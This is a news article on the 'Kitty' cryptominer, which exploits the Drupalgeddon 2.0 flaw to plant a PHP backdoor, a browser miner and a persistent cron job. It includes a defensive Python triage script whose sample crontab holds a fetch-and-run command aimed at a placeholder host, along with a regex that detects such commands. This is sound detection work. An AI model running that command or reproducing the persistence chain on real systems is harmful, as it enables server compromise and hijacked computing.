Yet another bad actor has taken advantage of Drupal sites still vulnerable to “Drupalgeddon 2.0,” this time to mine cryptocurrency.
The bad script, dubbed the “Kitty” cryptomining malware, takes advantage of the known critical remote-code execution vulnerability in Drupal (CVE-2018-7600) to target not only servers but also browsers, according to researchers at security company Imperva Incapsula.
On servers, the attackers install a mining program, "kkworker", an XMRig-based miner that mines the Monero (XMR) cryptocurrency.

But the attackers are also looking to extend their mining to the visitors of the compromised web application, using a browser mining script called me0w.js. They do this by injecting a reference to the malicious JavaScript (me0w.js) into the site's index.php, so that the processor time of every future visitor to the infected site is spent mining for them.
“To win over kitty lovers’ hearts, the attacker cheekily asks to leave his malware alone by printing ‘me0w, don’t delete pls i am a harmless cute little kitty, me0w,’” the researchers said.
To make it all happen, the actors behind Kitty first run a bash script that writes a PHP backdoor, a file called kdrupal.php, to the server's disk; the browser-side miner, me0w.js, is built on "webminerpool", an open-source mining tool for browsers.
“In doing so, the attacker reinforces their foothold in the infected server and guarantees dominance using a backdoor independent of the Drupal vulnerability,” according to Imperva’s report.
Researchers said that while the PHP backdoor is “fairly light and simple,” it has some tricks up its sleeve, including using the sha512 hash function to protect the attacker’s remote authentication.
Once this backdoor has been established, a cron job is registered that re-downloads and executes a bash script from remote hosts every minute. This means the attackers can easily re-infect the server and quickly push updates to the infected servers under their control.
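The indicators the report describes (a dropped kdrupal.php, a me0w.js reference injected into index.php, and an every-minute cron entry that fetches and runs a remote script) are easy to check for on a suspect Drupal host. The triage script below is an added example, not Imperva's tooling or the attackers' code; the web-root layout, the placeholder file contents and the crontab lines are constructed sample data, and the cron pattern is a generic "curl/wget piped into a shell, every minute" match rather than the attackers' exact command, which the article does not give.

```python
import os
import re
import tempfile

# Indicators named in the report: the dropped PHP backdoor and the
# browser-miner script injected into index.php.
BACKDOOR_NAMES = {"kdrupal.php"}
MINER_SCRIPT_RE = re.compile(r"me0w\.js", re.IGNORECASE)

# An every-minute cron line that fetches a remote script and pipes it into a
# shell. Generic pattern for the described behaviour (assumption), not the
# attacker's literal command line.
CRON_RE = re.compile(
    r"^\*\s+\*\s+\*\s+\*\s+\*\s+.*\b(?:curl|wget)\b.*\|\s*(?:ba)?sh\b",
    re.IGNORECASE | re.MULTILINE,
)


def scan_webroot(webroot):
    """Walk a web root and return sorted (indicator, path) pairs."""
    findings = []
    for dirpath, _dirs, files in os.walk(webroot):
        for name in files:
            path = os.path.join(dirpath, name)
            if name in BACKDOOR_NAMES:
                findings.append(("backdoor_file", path))
            elif name == "index.php":
                with open(path, encoding="utf-8", errors="replace") as fh:
                    if MINER_SCRIPT_RE.search(fh.read()):
                        findings.append(("miner_in_index", path))
    return sorted(findings)


def scan_crontab(crontab_text):
    """Return cron lines that re-fetch and execute a remote script every minute."""
    return [m.group(0) for m in CRON_RE.finditer(crontab_text)]


def build_sample_webroot():
    """Construct a throwaway Drupal-like tree with the indicators planted.

    Everything written here is sample data for the demo; kdrupal.php is an
    empty placeholder, not the real backdoor.
    """
    root = tempfile.mkdtemp(prefix="kitty-triage-")
    os.makedirs(os.path.join(root, "sites", "default"))
    with open(os.path.join(root, "index.php"), "w", encoding="utf-8") as fh:
        fh.write("<?php\n// Drupal front controller\n?>\n"
                 '<script src="/me0w.js"></script>\n')
    with open(os.path.join(root, "kdrupal.php"), "w", encoding="utf-8") as fh:
        fh.write("<?php /* placeholder standing in for the backdoor */ ?>\n")
    settings = os.path.join(root, "sites", "default", "settings.php")
    with open(settings, "w", encoding="utf-8") as fh:
        fh.write("<?php $databases = [];\n")
    return root


# Constructed crontab: one benign entry and one matching the described behaviour.
SAMPLE_CRONTAB = """\
0 3 * * * /usr/bin/certbot renew --quiet
* * * * * wget -qO- http://example.invalid/k.sh | bash
"""


if __name__ == "__main__":
    root = build_sample_webroot()
    for kind, path in scan_webroot(root):
        print(f"{kind}: {path}")
    for line in scan_crontab(SAMPLE_CRONTAB):
        print(f"suspicious cron: {line}")
```

On a real host, point scan_webroot at the Drupal document root and feed scan_crontab the output of `crontab -l` for the web server user plus the contents of /etc/crontab and /etc/cron.d; a hit on any of the three indicators means the box should be treated as compromised and rebuilt, since the cron entry will re-pull the attacker's script even after the Drupal patch is applied.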
Researchers said the Monero address used in Kitty has been spotted before in April, in attacks targeting web servers running the vBulletin 4.2.X CMS.
Interestingly, it appears the attacker has updated the malware version after every change in its code, according to the report.
“The first generation of the ‘Kitty malware’ we discovered was version 1.5, and the latest version is 1.6,” said the researchers. “This type of behavior can be an indication of an organized attacker, developing their malware like a software product, fixing bugs and releasing new features in cycles.”
Drupalgeddon 2.0, which has been patched for over a month now and impacts versions 6, 7 and 8 of Drupal's CMS platform, "potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised," according to MITRE's Common Vulnerabilities and Exposures entry for CVE-2018-7600, published March 28.
Since Drupal warned in March that over one million sites running Drupal are impacted by the vulnerability, several exploits have cropped up taking advantage of it.
That includes a botnet, dubbed Muhstik, that installs cryptocurrency miners and launches DDoS attacks via compromised systems. More recently, attackers behind a ransomware attack hitting the Ukrainian Energy Ministry appear to have made use of the highly critical remote-code execution bug.